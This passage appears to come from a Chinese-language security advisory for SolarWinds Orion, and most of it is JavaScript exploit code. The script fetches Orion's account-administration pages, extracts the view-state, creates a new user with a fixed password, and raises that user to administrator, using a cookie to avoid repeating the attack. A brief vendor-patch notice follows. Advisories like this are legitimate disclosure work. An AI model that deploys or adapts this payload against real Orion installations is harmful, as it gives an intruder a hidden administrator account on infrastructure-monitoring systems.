http.open("POST", url, false);
http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;
return(doc);
}
function getHtmlBody(url, ref)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', url, false);
xmlHttp.send(null);
var results = xmlHttp.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = results;
return(doc);
}
function getViewState(doc)
{
return(doc.getElementById("__VIEWSTATE"));
}
var username = "myuser";
var password = "test";
// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
// Get the initial view-state
var doc1 =
getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
// Create a new account with the given credentials
postCredentials(getViewState(doc1).value, username, password);
// Get the edit account view-state
var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID="
+ username + "&AccountType=Edit");
// Assign our new account with administrative privileges
setAdminPriv(getViewState(doc2).value, username);
// Set the cookie to avoid duplicated attacks
setCookie("o1", 1, "");
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
SolarWinds
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: